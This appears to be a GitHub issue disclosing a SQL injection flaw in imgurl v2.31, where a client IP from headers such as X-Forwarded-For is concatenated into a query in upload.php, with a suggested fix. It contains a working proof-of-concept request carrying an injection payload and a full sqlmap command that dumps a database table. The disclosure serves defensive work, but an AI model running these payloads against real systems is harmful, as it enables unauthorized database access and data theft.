You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Multiple ways are used to obtain user ip (使用了多种方法获取用户ip)
Then splice the user ip directly into the sql statement in lines 44 to 58 of upload.php(在upload.php的44到58行中,直接将ip拼接到了sql语句中)
query->uplimit($ip)
Proof of Concept
GET /upload/localhost HTTP/1.1Host: host.localCookie: XSRF-TOKEN=[Your_XSRF-TOKEN]; x-forwarded-for: ' union select case(2>1)when(1)then(10)else(0)end order by num desc-- Connection: close
Command for injection using sqlmap
python3 sqlmap.py -r http.txt --prefix="' union select case((1=1) and " --suffix=")when(1)then(10)else(0)end order by num desc-- " -level 3 -risk 3 --dbms sqlite -technique=B --text-only -T img_options -D values --dump
Repair method (修复方法)
Check user ip format or use PDO to prevent sql injection (检查用户ip格式或使用PDO来防止sql注入)
The text was updated successfully, but these errors were encountered:
Description (漏洞描述)
imgurl v2.31
Multiple ways are used to obtain user ip (使用了多种方法获取用户ip)
Then splice the user ip directly into the sql statement in lines 44 to 58 of upload.php(在upload.php的44到58行中,直接将ip拼接到了sql语句中)
query->uplimit($ip)
Proof of Concept
Command for injection using sqlmap
Repair method (修复方法)
Check user ip format or use PDO to prevent sql injection (检查用户ip格式或使用PDO来防止sql注入)
The text was updated successfully, but these errors were encountered: